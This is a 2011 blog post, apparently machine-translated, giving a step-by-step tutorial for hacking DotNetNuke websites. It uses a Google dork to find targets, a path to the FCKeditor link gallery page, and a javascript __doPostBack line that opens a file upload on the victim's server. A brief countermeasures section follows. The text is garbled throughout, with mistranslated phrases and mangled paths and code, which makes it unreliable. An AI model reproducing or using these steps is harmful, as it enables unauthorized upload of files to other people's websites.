Related Posts Plugin for WordPress, Blogger...

Hacking website with Dot Net Nuke exploit

Posted by VdoCity Tuesday, September 20, 2011

You might be interested in reading some posts related to RHA:


Hack a website using a directory traversal attack?
* The most common methods to hack a website

Note: The purpose of this tutorial is not to excite the hackers, but to make you aware of how hackers can hack your web


Hacking Website with DNN attack

Google Dork

An idiot is an act of google using Google provides search terms to get a specific result, and this vulnerability only occurs in DNN websites that have "/ portal / 0" on your navigation and search both GoAhead inurl: " / portals / 0 "which calls on google inurl to display all the URLs you have / portals / 0 at the navigation

1.Lets say the website is vulnerable:

www.vulnerablewebsite.com/portals/0

2. Now we will just add Suppliers / HtmlEditorProviders / Fck / fcklinkgallery.aspx after the url for www.vulnerablewebsite.com/portals/0 become www. vulnerablewebsite.com/portals/0Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

3.Now a website is vulnerable to such attacks as a window similar to the bottom:


4.Next enter the following JavaScript code in the address bar:
javascript: __doPostBack ('$ ctlURL cmdUpload', ")

Javascript What this will do is allow us to raise our image in the server:


5.The hackers could upload images to the website for the victims.


Countermeasures

1. The easiest method is to change the name of your fcklinkgallery to something that will not prevent this attack, but you can protect children's writing in this way, a skilled hacker can find the file named by using some methods Footprint

2.Another way to prevent this attack is to upgrade to IIS 7 or higher and a version of DNN 4.9.4 or higher

Do not hesitate to ask if you have any problems with anything mentioned in this tutorial.

0 comments

Post a Comment